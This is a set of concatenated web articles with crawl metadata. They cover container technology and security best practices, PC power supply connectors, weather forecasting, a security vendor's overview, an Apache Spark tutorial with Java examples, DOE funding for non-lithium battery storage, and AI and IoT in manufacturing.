Recently, Microsoft adopted container technology, enabling containers to run natively on Windows 10 and Windows Server. Microsoft and Docker worked together to build a native Docker for Windows variant. Kubernetes and Docker Swarm shortly followed.
It is now possible to create and run native Windows and Linux containers on Windows 10 devices. You can also deploy and orchestrate these on Windows servers or Linux servers if you use Linux containers.
What Is Windows Subsystem for Linux?
The Windows Subsystem for Linux (WSL) lets you run a Linux file system, Linux command-line tools, and GUI applications directly on Windows. WSL is a feature of the Windows operating system that enables you to use Linux with the traditional Windows desktop and applications.
Here are common WSL use cases:
- Use Bash, Linux-first languages and frameworks like Ruby and Python, and common Linux tools like sed and awk alongside Windows productivity tools.
- Run Linux in a Bash shell with various distributions, such as Ubuntu, OpenSUSE, Debian, Kali, and Alpine. It enables you to use Bash while running command-line Linux tools and applications.
- Use Windows applications and Linux command-line tools on the same set of files.
WSL requires less CPU, memory, and storage resources than a VM. Developers use WSL to deploy to Linux server environments or work on open source web development projects.
What are Container Runtimes?
Containers are lightweight virtual, isolated entities that include dependencies. They require a container runtime (which typically comes with the container engine) that can unpack the container image file and translate it into a process that can run on a computer.
You can find various types of available container runtimes. Ideally, you should choose the runtime compatible with the container engine of your choice. Here are key container runtimes to consider:
- containerd—this container runtime manages the container lifecycle on a host, which can be a physical or virtual machine (VM). containerd is a daemon process that can create, start, stop, and destroy containers. It can also pull container images from registries, enable networking for a container, and mount storage.
- LXC—this Linux container runtime consists of templates, tools, and language and library bindings. LXC is low-level, highly flexible, and covers all containment features supported by the upstream kernel.
- CRI-O—this is an implementation of the Kubernetes Container Runtime Interface (CRI) that enables you to use Open Container Initiative (OCI)-compatible runtimes. CRI-O offers a lightweight alternative to employing Docker as a runtime for Kubernetes. It lets Kubernetes use any OCI-compliant runtime as a container runtime for running pods. CRI-O supports Kata and runc as container runtimes, but you can plug in any OCI-conformant runtime.
- Kata—a Kata container can improve the isolation and security of container workloads. It offers the benefits of using a hypervisor, including enhanced security, alongside container orchestration functionality provided by Kubernetes. Unlike the runC runtime, the Kata container runtime uses a hypervisor for isolation when spawning containers, creating lightweight VMs and putting containers inside.
The Open Container Initiative (OCI) is a standard that helps developers build container runtimes that will support Kubernetes and other container orchestrators. It defines the configuration, file-system layers, and manifest that specify how a runtime should function. OCI also includes a standard specification for container images.
Learn more in our detailed guide to container runtimes
Containers vs. Virtual Machines
A virtual machine (VM) is an environment created on a physical hardware system that acts as a virtual computer system with its own CPU, memory, network interfaces, and storage. It is a “guest operating system” running within the “host operating system” installed directly on the host machine.
Containerization and virtualization are similar in that applications can run in multiple environments. The main differences are size, portability, and the level of isolation:
- VMs—Each VM has its own operating system, which can perform multiple resource-intensive functions at once. Because more resources are available on the VM, it can abstract, partition, clone, and emulate servers, operating systems, desktops, databases, and networks. A VM has strong isolation because it runs its own operating system.
- Containers—runs specific package applications, their dependencies and the minimal execution environment they require. A container typically runs one or more applications, and does not attempt to emulate or replicate an entire server. A container has inherently weaker isolation because it shares the operating system kernel with other containers and processes.
Learn more in our guide to Docker vs. virtual machines
Containers and Kubernetes
Kubernetes is a container orchestration platform provided as open source software. It enables you to unify a cluster of machines as a single pool of computing resources. You can employ Kubernetes to organize applications into groups of containers. Kubernetes uses the Docker engine to run the containers, ensuring your application runs as intended.
Here are key features of Kubernetes:
- Compute scheduling—Kubernetes automatically considers the resource needs of containers to find a suitable place to run them.
- Self-healing—when a container crashes, Kubernetes creates a new one to replace it.
- Horizontal scaling—Kubernetes can observe CPU or custom metrics and add or remove instances according to actual needs.
- Volume management—Kubernetes can manage your application’s persistent storage.
- Service discovery and load balancing—Kubernetes can load balance IP addresses, multiple instances, and DNS.
- Automated rollouts and rollbacks—Kubernetes monitors the health of new instances during updates. The platform can automatically roll back to a previous version if a failure occurs.
- Secret and configuration management—Kubernetes can manage secrets and application configuration.
Containers serve as the foundation of modern, cloud native applications. Docker offers the tools needed to create container images easily, and Kubernetes provides a platform that runs everything.
Best Practices for Building Container Images
Use the following best practices when writing Dockerfiles to build images:
- Ephemeral—you should build containers as ephemeral entities that you can stop or delete at any moment. It enables you to replace a container with a new one from the Dockerfile with minimal configuration and setup.
- dockerignore—a .dockerignore file can help you reduce image size and build time. You achieve this by excluding any unnecessary files from the build context. By default the Docker image includes the recursive contents of a directory in which the Dockerfile resides, and .dockerignore lets you specify files that should not be included.
- Size—you should reduce image file sizes to minimize the attack surface. Use small base images such as Alpine Linux or distroless Linux images. However, you do need to keep Dockerfiles readable. You can apply a multi-stage build (available only for Docker 17.05 or higher) or a builder pattern.
- Multi-stage build—this build lets you use multiple FROM statements within a single Dockerfile. It enables you to selectively copy artifacts from one stage to another, leaving behind anything unneeded in the final image. You can use it to reduce image file sizes without maintaining separate Dockerfiles and custom scripts for a builder pattern.
- Packages—never install unnecessary packages when you build images.
- Commands—do not use multiple RUN commands. When possible, use multi-line commands for faster builds, for example, when you need to install a list of packages.
- Linters—use a linter to automatically catch errors in your Docker file and clean up your syntax and layout.
Learn more in our detailed guide to container images
Best Practices for Container Security
Container security is a process that includes various steps. It covers container building, content and configuration assessment, runtime assessment, and risk analysis. Here are key security best practices for containers:
- Prefer slim containers—you can minimize the application’s attack surface by removing unnecessary components.
- Use only trusted base images—the CI/CD process should only include usable images that were previously scanned and tested for reliability.
- Harden the host operating system—you should use a script to configure the host properly according to CIS benchmarks. You can use a lightweight Linux distribution for hosting containers like CoreOS or Red Hat Enterprise Linux Atomic Host.
- Remove permission—you should never run a privileged container because it allows malicious users to take over the host system. It threatens your entire infrastructure.
- Manage secrets—a secret can include database credentials, SSL keys, encryption keys, or API keys. You must manage secrets to ensure it is impossible to discover them.
- Run source code tests—software composition analysis (SCA) and static application security testing (SAST) tools have evolved to support DevOps and automation. They are integral to container security, helping you track open source software, license restrictions, and code vulnerabilities. | <urn:uuid:26f33ab5-eb6e-433d-ab8b-bdafc233ec71> | CC-MAIN-2024-38 | https://www.aquasec.com/cloud-native-academy/docker-container/what-is-a-container/ | 2024-09-11T04:20:32Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651343.80/warc/CC-MAIN-20240911020451-20240911050451-00792.warc.gz | en | 0.887911 | 3,010 | 3.15625 | 3 |
The power supply is the lifeblood of the computer: without it, the machine cannot function, no matter how good the hardware and software installed in it are. If you unplug the computer from the wall and open the case, you will see a large box with thick wires running out of it; that box is the power supply. Because a significant amount of power flows through these connections, always unplug the power supply before installing or reinstalling hardware, since the current can cause serious shocks. The sections below describe the common power supply options and connector types, and how they are installed in a computer.
The connectors coming from the power supply differ in size and type. Open the case and you will find many wires and connectors, each feeding a different part of the system in some way: the motherboard itself, video cards, drives, and other devices, so that every component receives the appropriate power. The following connector types are commonly found in a computer:
SATA: The storage drives in a computer also need power, but a SATA drive does not use the ordinary 4-pin connector; it uses a dedicated SATA power connector. This connector powers current SATA drives as well as the drives released during the transition to SATA. The SATA power connection sits at the far left side of the drive. Drives from the transition period often included a Molex socket as well, so if you only have a Molex connector available, such a drive may let you use it instead. Modern SATA drives normally have only the single SATA power connection; that connector is keyed specifically for SATA devices.
Molex: This is the most common connection type found in a computer: a simple 4-pin power connector. It takes its name from Molex, the company that originally manufactured it. Molex is actually a very large connector manufacturer and has created many connector families, but in PCs the name has stuck to this particular plug. Molex connectors typically power internal peripherals such as CD-ROM and other optical drives, and many case fans connect to them as well.
4/8-Pin 12V: Despite also having four pins, this connector is not a Molex plug; it is the ATX12V connector (sometimes called P4), which plugs into the motherboard to supply 12 V power for the processor. Its pins are slanted on one side so that it fits its socket only one way. The 8-pin version is called EPS12V; it was designed for servers and multi-purpose systems, and for multi-core processors that need a lot of power. With eight pins, it can deliver considerably more current. You will usually find these connectors on the motherboard alongside the 24-pin main power connector.
PCIe 6/8-Pin: The motherboard isn't the only part of the computer that demands a great deal of power. PCIe cards can need more power than the slot provides, so there are 6-pin and 8-pin power connectors designed specifically for PCIe; they connect directly to sockets on the card. A 6-pin connector carries up to 75 watts and an 8-pin connector up to 150 watts. The reason PCIe cards need so much energy is that powerful video cards carry their own processors, plus fans to cool the heat the card generates. Look along the top edge of a video card and you will find these sockets; if the card needs more energy, you can attach additional connectors there.
20-Pin: The 20-pin main connector was used in earlier systems, when standards were lower and less power was needed to keep a system running. Now that the tables have turned and more power is required, the plain 20-pin connector is less common; you will usually find it paired with an extra 4-pin section so that enough power can be supplied for modern devices to perform properly.
24-Pin: As devices have evolved, their power needs have increased dramatically. The 20-pin connector is no longer sufficient, and the 24-pin connector has replaced it. This connector is quite large and sits on the motherboard, so it is easy to find. Simply insert the plug, and a direct connection is established between the power supply and the motherboard.
Floppy: Floppy drives are rarely used anymore, but if a computer has one, it uses a rather different connector: a very small 4-pin plug generically called the floppy connector, and sometimes the Berg connector. It is so small because a floppy drive requires very little power. Its unique size also makes it easy to pick out the right power connection and attach it so the drive works properly.
As you examine the power supplies in a computer, you will encounter terms you may not recognize. A common example is A, which stands for ampere: the unit of electric current, indicating how much charge passes a given point in a given time. Here are some specifications you should know:
Wattage: Another important term is the watt, the unit of power, calculated as volts times amps. Take the voltage, multiply it by the amperage (the amount of current flowing), and you get the wattage; for example, a 60 W load corresponds to 120 V at 0.5 A. Wattage figures appear in several places on a power supply: the label lists the volts and amps available from its various rails, and also states the total wattage the unit can deliver at any one time (for example, 2000 watts on a high-end unit).
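To make the arithmetic concrete, here is a tiny illustrative snippet (the class name is made up, not a standard API) that applies the watts = volts × amps relationship described above:

```java
// Illustrative helper: watts = volts * amps.
// PowerMath is a hypothetical name used only for this example.
public class PowerMath {
    public static double watts(double volts, double amps) {
        return volts * amps;
    }

    public static void main(String[] args) {
        // The article's example: a 120 V, 0.5 A load draws 60 W
        System.out.println(watts(120.0, 0.5)); // 60.0
    }
}
```

Running the same calculation in reverse also works: a PSU rail rated 12 V at 18 A can deliver 216 W.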
Size: Connector sizes matter, since many connectors come in several sizes. When connecting them, make sure the connector matches its socket so the connection is made correctly and current can flow easily. Smaller motherboards have smaller power connections and therefore require smaller connectors.

Number of Connectors: Another important consideration is how many connectors a power supply provides. Since supplies vary, choose the connectors carefully so that every device's power demand is met and each connected device can work properly.
ATX: ATX is a standardized power supply form factor. The shape and size are so standardized that you can easily find an ATX supply and connect it exactly where the old one was: an ATX connection accepts any ATX connector, new or old. An ATX power supply can offer many different connector types, allowing much of the hardware to draw power directly. When buying a power supply, make sure the size is the same and that the current and new connectors are compatible. Power supplies are not all rigid, either; some ATX units are modular, with standardized sockets on the back of the unit, so you attach only the cables you need on the other side. This lets you minimize the cables inside the computer and easily add or remove cables of whatever type you require.
Micro ATX: As noted, motherboards come in various sizes, and a small motherboard calls for a small power supply. The micro ATX form factor fills that need: it is compact and connects to a small motherboard quite easily. So be cautious even with ATX connectors, since sizes can vary.
Dual Voltage: This option means the unit can operate at either of two supply voltages. Different countries use different mains voltages, and this feature lets manufacturers market the same product in other countries, since the voltage can be adjusted. The user selects the voltage with a small switch: where the PC's power cord attaches at the back of the case, some units have a small switch with the voltages marked, such as 115 V or 220 V, and you can set the option yourself.
With all of this, you can familiarize yourself with the power connection types and configure them yourself. Unplugging the computer, opening it up, and examining the power supply connections is also a good way to deepen your knowledge. Pay attention to connector sizes and counts: if the size is wrong, the connector may not attach at all, or may attach loosely so that power does not flow properly through the circuit. Check the documentation for the voltage the power supply should provide, and make sure each component is receiving the power it needs. Ensuring everything is in the right place helps the computer power on safely and successfully.
Weather forecasting serves many purposes and needs. It can help people and agencies plan for the future and make rational decisions. A meteorologist's fundamental aim is to understand atmospheric processes and then predict future weather as far in advance as possible.

Adapting to the climatic environment, by adjusting to its regular patterns and withstanding its adverse extremes, is essential for the survival of life. Weather forecasting is therefore indispensable everywhere in the world.
#### The goal of atmospheric studies
Weather prediction is said to be the ultimate goal of atmospheric research. It is the most advanced area in the study and application of meteorology. To make a correct forecast, a meteorologist must first understand what processes are occurring in the atmosphere to produce the current weather at the location being forecast. This is done by measuring certain factors of the atmosphere (making observations).
Computer Security and Cyber Security: What You Need To Know
In today’s digital age, understanding the difference between computer security and cyber security is essential for protecting your business. With the rise in cyber threats and the increasing reliance on technology, ensuring your company’s data and systems are secure is more important than ever. Here’s what you need to know.
The Difference Between Computer Security and Cyber Security
Computer Security refers to measures taken to protect the physical components and the software of a standalone computer system. This includes keeping computers, laptops, and other devices updated and properly patched to safeguard against unauthorized access and potential threats. Computer security ensures that the hardware and software of individual devices are protected from breaches and attacks.
Cyber Security, on the other hand, encompasses a broader scope. It involves protecting your company’s entire digital footprint, including networks, systems, and data, from unauthorized access, cyberattacks, and other online threats. Cyber security focuses on defending against various forms of cyber threats such as ransomware, malware, phishing, and more. It ensures the confidentiality, integrity, and availability of your digital information across all connected devices and systems.
Why You Need Computer and Cyber Security
Both computer security and cyber security are crucial for any modern business. Cyberattacks can result in significant financial loss, data breaches, and damage to your company's reputation, and robust cyber security measures help protect against these threats. Many industries have strict data protection regulations that businesses must comply with; failure to do so can result in hefty fines and legal issues, so proper security measures ensure compliance and help you avoid regulatory penalties. Data breaches and cyberattacks can also disrupt business operations, leading to downtime and lost productivity; effective security measures help maintain business continuity by preventing and mitigating the impact of such incidents. Finally, clients and customers trust that their data is secure with your business, and strong security measures protect customer data, enhancing trust and loyalty.
How Cyber Security and Computer Security Affect Your Business
Cyber threats can have devastating effects on businesses, regardless of size. Small businesses are often targeted because they may lack the resources to implement robust security measures. A single successful cyberattack can lead to data loss, financial damage, and a tarnished reputation. Additionally, recovery from such incidents can be costly and time-consuming, further impacting business operations.
At Atruent, we understand the unique security challenges businesses face. Our comprehensive security solutions are designed to protect your business from both computer and cyber threats. Atruent provides continuous monitoring and management of your systems to detect and respond to threats in real-time, minimizing the risk of breaches. We tailor our security solutions to meet the specific needs of your business, ensuring that all potential vulnerabilities are addressed. Atruent helps businesses comply with industry regulations by implementing the necessary security protocols and providing ongoing support to maintain compliance. Our disaster recovery services ensure that your data is backed up and can be quickly restored in the event of an incident, minimizing downtime and ensuring business continuity. Our team of seasoned security professionals is always available to provide support and guidance, ensuring your business remains secure against evolving threats.
By partnering with Atruent, you can rest assured that your business is protected from the myriad of cyber threats present in today’s digital landscape. Our expert team is dedicated to providing top-notch security solutions that keep your data safe and your business running smoothly. | <urn:uuid:a9e5bac0-aa00-4f11-99b0-f1002096f023> | CC-MAIN-2024-38 | https://www.atruent.com/computer-security-and-cyber-security-what-you-need-to-know/ | 2024-09-07T16:32:26Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00292.warc.gz | en | 0.942989 | 691 | 2.796875 | 3 |
What is Spark? Let’s take a look under the hood
In my previous post, we introduced a problem (copious, never-ending streams of data) and its solution: Apache Spark. Here in Part II, we'll focus on Spark's internal architecture and data structures.
In pioneer days they used oxen for heavy pulling, and when one ox couldn’t budge a log, they didn’t try to grow a larger ox. We shouldn’t be trying for bigger computers, but for more systems of computers — Grace Hopper
With the scale of data growing at a rapid and ominous pace, we needed a way to process potential petabytes of data quickly, and we simply couldn’t make a single computer process that amount of data at a reasonable pace. This problem is solved by creating a cluster of machines to perform the work for you, but how do those machines work together to solve the common problem?
Spark is the cluster computing framework for large-scale data processing. Spark offers a set of libraries in 3 languages (Java, Scala, Python) for its unified computing engine. What does this definition actually mean?
- Unified: With Spark, there is no need to piece together an application out of multiple APIs or systems. Spark provides you with enough built-in APIs to get the job done.
- Computing engine: Spark handles loading data from various file systems and runs computations on it, but does not store any data itself permanently. Spark operates entirely in memory — allowing unparalleled performance and speed.
- Libraries: Spark is comprised of a series of libraries built for data science tasks. Spark includes libraries for SQL (SparkSQL), Machine Learning (MLlib), Stream Processing (Spark Streaming and Structured Streaming), and Graph Analytics (GraphX).
The Spark Application
Every Spark Application consists of a Driver and a set of distributed worker processes (Executors).
The Driver runs the main() method of our application and is where the SparkContext is created. The Spark Driver has the following duties:
- Runs on a node in our cluster, or on a client, and schedules the job execution with a cluster manager
- Responds to user’s program or input
- Analyzes, schedules, and distributes work across the executors
- Stores metadata about the running application and conveniently exposes it in a webUI
An executor is a distributed process responsible for the execution of tasks. Each Spark Application has its own set of executors, which stay alive for the life cycle of a single Spark application.
- Executors perform all data processing of a Spark job
- Stores results in memory, only persisting to disk when specifically instructed by the driver program
- Returns results to the driver once they have been completed
- Each node can have anywhere from 1 executor per node to 1 executor per core
Spark’s Application Workflow
When you submit a job to Spark for processing, there is a lot that goes on behind the scenes.
- Our Standalone Application is kicked off, and initializes its SparkContext. Only after having a SparkContext can an app be referred to as a Driver
- Our Driver program asks the Cluster Manager for resources to launch its executors
- The Cluster Manager launches the executors
- Our Driver runs our actual Spark code
- Executors run tasks and send their results back to the driver
- SparkContext is stopped and all executors are shut down, returning resources back to the cluster
Let's take a deeper look at the Spark job we wrote in Part I to find max temperature by country. That abstraction hid a lot of set-up code, including the initialization of our SparkContext, so let's fill in the gaps:
MaxTemperature Spark Setup
Remember that Spark is a framework, in this case, implemented in Java. It isn’t until line 16 that Spark needs to do any work at all. Sure, we initialized our SparkContext, however, loading data into an RDD is the first bit of code that requires work be sent to our executors.
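The elided setup amounts to building a SparkConf and a JavaSparkContext before line 16 can run. Here is a minimal sketch of that bootstrap using the standard Spark Java API — the `local[*]` master and the argument handling are illustrative choices, and the code needs the Spark dependency on the classpath to actually run:

```java
import org.apache.spark.SparkConf;
import org.apache.spark.api.java.JavaRDD;
import org.apache.spark.api.java.JavaSparkContext;

public class MaxTemperature {
    public static void main(String[] args) {
        // Configuration: app name plus a master URL ("local[*]" runs
        // everything in-process, handy for testing; a real cluster would
        // get its master from spark-submit instead)
        SparkConf conf = new SparkConf()
                .setAppName("MaxTemperature")
                .setMaster("local[*]");
        JavaSparkContext sc = new JavaSparkContext(conf);

        // Line 16 of the original listing: the first call that touches data
        JavaRDD<String> weatherData = sc.textFile(args[0]);

        // ... transformations and actions from Part I go here ...

        sc.stop(); // release executors and return resources to the cluster
    }
}
```

Only once the SparkContext exists is our program a Driver in the sense described above.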
By now you may have seen the term “RDD” appear multiple times, it’s about time we define it.
Spark Architecture Overview
Spark has a well-defined layered architecture with loosely coupled components based on two primary abstractions:
- Resilient Distributed Datasets (RDDs)
- Directed Acyclic Graph (DAG)
Resilient Distributed Datasets
RDDs are essentially the building blocks of Spark: everything is comprised of them. Even Spark's higher-level APIs (DataFrames, Datasets) are composed of RDDs under the hood. What does it mean to be a Resilient Distributed Dataset?
- Resilient: Since Spark runs on a cluster of machines, data loss from hardware failure is a very real concern, so RDDs are fault tolerant and can rebuild themselves in the event of failure.
- Distributed: A single RDD is stored on a series of different nodes in the cluster, belonging to no single source (and with no single point of failure). This way our cluster can operate on our RDD in parallel.
- Dataset: A collection of values — this one you should probably have known already.
All data we work with in Spark will be stored inside some form of RDD — it is, therefore, imperative to fully understand them.
Spark offers a slew of “Higher Level” APIs built on top of RDDs designed to abstract away complexity, namely the DataFrame and Dataset. With a strong focus on Read-Evaluate-Print-Loops (REPLs), Spark-Submit and the Spark-Shell in Scala and Python are targeted toward Data Scientists, who often desire repeat analysis on a dataset. The RDD is still imperative to understand, as it’s the underlying structure of all data in Spark.
An RDD is colloquially equivalent to a "distributed data structure". A JavaRDD<String> is essentially just a List<String> dispersed amongst each node in our cluster, with each node getting several different chunks of our List. With Spark, we need to think in a distributed context, always.
RDDs work by splitting up their data into a series of partitions to be stored on each executor node. Each node will then perform its work only on its own partitions. This is what makes Spark so powerful: If an executor dies or a task fails Spark can rebuild just the partitions it needs from the original source and re-submit the task for completion.
Spark RDD partitioned amongst executors
RDDs are immutable, meaning that once they are created, they cannot be altered in any way; they can only be transformed. The notion of transforming RDDs is at the core of Spark, and Spark jobs can be thought of as nothing more than any combination of these steps:

- Loading data into an RDD
- Transforming an RDD
- Performing an action on an RDD

In fact, every Spark job I've written consists exclusively of those types of tasks, with vanilla Java for flavour.
Spark defines a set of APIs for working with RDDs that can be broken down into two large groups: Transformations and Actions.
Transformations create a new RDD from an existing one.
Actions return a value, or values, to the Driver program after running a computation on its RDD.
For example, the map function weatherData.map() is a transformation that passes each element of an RDD through a function.
Reduce is an RDD action that aggregates all the elements of an RDD using some function and returns the final result to the driver program.
"I choose a lazy person to do a hard job. Because a lazy person will find an easy way to do it." — Bill Gates
All transformations in Spark are lazy. This means that when we tell Spark to create an RDD via transformations of an existing RDD, it won't generate that dataset until a specific action is performed on it or one of its children. Spark will then perform the transformation and the action that triggered it. This allows Spark to run much more efficiently.
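Java's own Stream API follows the same model, which makes for a handy local analogy (this is plain Java, not Spark): intermediate operations build up a pipeline but do no work until a terminal operation runs.

```java
import java.util.List;
import java.util.concurrent.atomic.AtomicInteger;
import java.util.stream.Stream;

// Demonstrates lazy evaluation: the map() lambda below runs zero times
// while the pipeline is being built, and only executes once reduce()
// (the "action") is called -- mirroring Spark's transformation/action split.
public class LazyDemo {
    public static boolean mapIsLazy(List<String> lines) {
        AtomicInteger calls = new AtomicInteger();
        Stream<Integer> pipeline =
            lines.stream().map(s -> { calls.incrementAndGet(); return s.length(); });
        boolean nothingRanYet = (calls.get() == 0); // building the pipeline did no work
        pipeline.reduce(0, Integer::sum);           // terminal op triggers execution
        return nothingRanYet && calls.get() == lines.size();
    }
}
```

The same intuition applies to Spark: declaring a transformation costs nothing; the action pays for everything upstream of it.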
Let’s re-examine the function declarations from our earlier Spark example to identify which functions are actions and which are transformations:
16: JavaRDD<String> weatherData = sc.textFile(inputPath);
Line 16 is neither an action nor a transformation; it's a function of sc, our JavaSparkContext.
17: JavaPairRDD<String, Integer> tempsByCountry = weatherData.mapToPair(new Func.....
Line 17 is a transformation of the weatherData RDD, in it we map each line of weatherData to a pair comprised of (City, Temperature)
26: JavaPairRDD<String, Integer> maxTempByCountry = tempsByCountry.reduceByKey(new Func....

Line 26 is also a transformation, not an action: reduceByKey folds the values for each key, reducing each city to its highest recorded temperature, and returns a new RDD rather than a value to the driver.
Finally, on line 31 we trigger a Spark action: saving our RDD to our file system. Since Spark subscribes to the lazy execution model, it isn't until this line that Spark generates weatherData, tempsByCountry, and maxTempByCountry before finally saving our result.
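To make the per-key fold concrete, here is a plain-Java sketch (illustrative names, not the Spark API) of what the line-26 step computes for a handful of readings — for each city, keep only the maximum temperature seen:

```java
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Local sketch of the reduceByKey semantics: fold values per key with max.
// Spark performs this fold on each partition and then merges the partial
// results; here we simply fold over a single in-memory list.
public class MaxTempByCity {
    public static Map<String, Integer> maxByCity(List<Map.Entry<String, Integer>> readings) {
        Map<String, Integer> result = new HashMap<>();
        for (Map.Entry<String, Integer> reading : readings) {
            // merge() applies Math::max when the key is already present
            result.merge(reading.getKey(), reading.getValue(), Math::max);
        }
        return result;
    }
}
```

Because max is associative and commutative, Spark can apply it partition-by-partition and merge the partials without changing the answer — the property reduceByKey relies on.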
Directed Acyclic Graph
Whenever an action is performed on an RDD, Spark creates a DAG: a finite directed graph with no directed cycles (otherwise our job would run forever). Remember that a graph is nothing more than a series of connected vertices and edges, and this graph is no different. Each vertex in the DAG is a Spark function: some operation performed on an RDD (map, mapToPair, reduceByKey, etc).
In MapReduce, the DAG consists of two vertices: Map → Reduce
In our above example of MaxTemperatureByCountry, the DAG is a little more involved:
parallelize → map → mapToPair → reduce → saveAsHadoopFile
The DAG allows Spark to optimize its execution plan and minimize shuffling. We’ll discuss the DAG in greater depth in later posts, as it’s outside the scope of this Spark overview.
With our new vocabulary, let us re-examine the problem with MapReduce as I defined it in Part I, quoted below:
“MapReduce excels at batch data processing, however it lags behind when it comes to repeat analysis and small feedback loops. The only way to reuse data between computations is to write it to an external storage system (a la HDFS)”
‘Re-use data between computations’? Sounds like an RDD that can have multiple actions performed on it! Let's suppose we have a file “data.txt” and want to accomplish two computations:
- Total length of all lines in the file
- Length of the longest line in the file
In MapReduce, each task would require a separate job or a fancy MultipleOutputFormat implementation. Spark makes this a breeze in just four simple steps:
1. Load the contents of data.txt into an RDD
JavaRDD<String> lines = sc.textFile("data.txt");
2. Map each line of ‘lines’ to its length (Lambda functions used for brevity)
JavaRDD<Integer> lineLengths = lines.map(s -> s.length());
3. To solve for total length: reduce lineLengths to find the total line length sum, in this case, the sum of every element in the RDD
int totalLength = lineLengths.reduce((a, b) -> a + b);
4. To solve for longest length: reduce lineLengths to find the maximum line length
int maxLength = lineLengths.reduce((a, b) -> Math.max(a,b));
Note that steps 3 and 4 are RDD actions, so they return a result to our driver program (in this case, a Java int). Also recall that Spark is lazy and refuses to do any work until it sees an action; in this case, it will not begin any real work until step 3.
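For readers without a Spark cluster handy, the same four steps can be mimicked in plain Python (an in-memory list stands in for the RDD; unlike Spark, this version computes eagerly at each step, and the file contents are hard-coded so the sketch is self-contained):

```python
# Plain-Python sketch of the same two computations (an in-memory list stands
# in for the RDD; this is an illustration, not Spark code).
from functools import reduce

# 1. "Load" the contents of data.txt (hard-coded here for a self-contained demo)
lines = ["spark is lazy", "mapreduce is not", "rdds can be reused"]

# 2. Map each line to its length
line_lengths = [len(s) for s in lines]

# 3. Reduce to the total length of all lines
total_length = reduce(lambda a, b: a + b, line_lengths)

# 4. Reduce to the length of the longest line
max_length = reduce(lambda a, b: max(a, b), line_lengths)

print(total_length, max_length)
```

The key difference is that `line_lengths` here is materialized immediately, whereas Spark’s lineLengths RDD would only be computed when the first reduce runs, and could then be reused by the second without re-reading the input.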
So far we’ve introduced our data problem and its solution: Apache Spark. We reviewed Spark’s architecture and workflow, its flagship internal abstraction (RDD), and its execution model. Next, we’ll look into Functions and Syntax in Java, getting progressively more technical as we dive deeper into the framework.
The US government’s Department of Energy (DOE) is set to pump $100 million into projects looking at non-lithium batteries for long-term energy storage.
It has issued a notice of intent offering to fund pilot-scale energy storage demonstration projects that focus on “non-lithium technologies, long-duration (10+ hour discharge) systems, and stationary storage applications.”
Such systems could form an important part of the transition to renewable energy for data center operators and grid providers, allowing them to capture and store solar or wind power at times of high supply so that it can be used when resources are scarce. They could also underpin backup power systems by storing renewable energy for use in emergencies.
The DOE expects the US will need an additional 700-900GW if the nation is to reach its 2050 net zero target. “Short duration energy storage is already supporting the grid, but continued deployment of variable renewable energy may push the requirement beyond the energy storage systems that exist today,” a statement from the department said.
“To support a growing reliance on variable renewable energy, LDES systems will play a key role in offering dispatchable backup power that can be deployed when needed to ensure grid resilience.”
The DOE is providing the funding through its Office of Clean Energy Demonstrations (OCED). It is aiming to support three to 15 projects with grants of $5-$20 million which will need to be matched with private investment. The OCED funding will “support technology maturation activities including design for manufacturability, pilot system development, fabrication and installation, operational testing and validation, and commercial scale system design and supply chain growth.”
Projects will require applicants to have a team that includes a technology provider and “encourage [the] inclusion of utilities, facility owner/operators, developers, financiers, and others that support a clear path to commercial adoption.”
Battery researchers around the world are looking at alternatives to lithium-based batteries. In June, DCD reported on a project by academics at the UK’s University of Southampton which claims to have developed a battery with a water-based electrolyte suitable for large-scale storage.
US startup Unigrid recently raised $12 million to help it develop its storage battery, which is based on a novel sodium-ion chemistry. | <urn:uuid:2493917f-fd9e-4f70-ae5b-47dd00aed8e8> | CC-MAIN-2024-38 | https://www.datacenterdynamics.com/en/news/us-department-of-energy-to-pump-100m-into-non-lithium-battery-storage-projects/ | 2024-09-08T23:55:27Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651035.2/warc/CC-MAIN-20240908213138-20240909003138-00192.warc.gz | en | 0.946348 | 486 | 2.59375 | 3 |
The advent of artificial intelligence (AI), robotics, and the Internet of Things (IoT) is fundamentally revolutionizing the manufacturing sector. Innovations in these fields have enabled manufacturers to significantly enhance productivity, cost-efficiency, and product quality. This article explores how these technological advancements are shaping the modern manufacturing landscape.
Robotics and Automation
The integration of robotics and automation into manufacturing processes represents a transformative leap forward, fundamentally altering how goods are produced. Collaborative robots, or ‘cobots,’ are becoming increasingly prevalent across a variety of manufacturing operations. Cobots are specifically designed to work alongside human employees, performing tasks such as welding, assembly, and product inspection. These robots not only boost productivity but also play a crucial role in improving workplace safety by significantly reducing the incidence of injuries related to repetitive or hazardous tasks.
In addition to these advantages, cobots are evolving to become more cost-effective and adaptable. This financial accessibility makes them an attractive option for Small and Medium Enterprises (SMEs), democratizing automation technology and enabling smaller manufacturers to benefit from increased efficiency and reduced operational costs. The implementation of these robots allows companies to optimize their production lines, leading to more consistent product quality and less variability, further driving operational success and competitiveness in a crowded market.
Artificial Intelligence (AI)
The role of AI in modern manufacturing is both multifaceted and profound, impacting many layers of the production process. One of the key applications of AI is in predictive maintenance. AI systems possess the capability to analyze vast amounts of operational data to forecast when machinery will likely require maintenance. By predicting these needs ahead of time, manufacturers can significantly reduce downtime and extend the lifespan of their equipment. This predictive capability not only enhances overall productivity but also ensures the smooth and continuous operation of manufacturing lines, minimizing unexpected breakdowns.
Another crucial application of AI is in quality control. By leveraging machine learning and image recognition technologies, AI-driven quality control systems can detect defects with remarkable precision and speed. These systems reduce waste by identifying imperfections early in the production process, ensuring that only high-quality items reach the market. This enhancement in quality control elevates customer satisfaction, strengthens brand reputation, and ultimately leads to better sales performance. AI’s integration into quality monitoring also enables faster response times to manufacturing issues, allowing for quick adjustments and continuous improvement.
The Internet of Things (IoT)
Creating Smart Factories
The Internet of Things (IoT) is instrumental in developing smart factories, where interconnected devices communicate in real-time to optimize manufacturing processes. By embedding sensors into machinery and gathering data continuously, manufacturers gain invaluable insights into machine performance and potential issues. This real-time data exchange enables quicker, more informed decision-making that enhances operational efficiency and significantly reduces downtime, thus maintaining a more productive manufacturing environment.
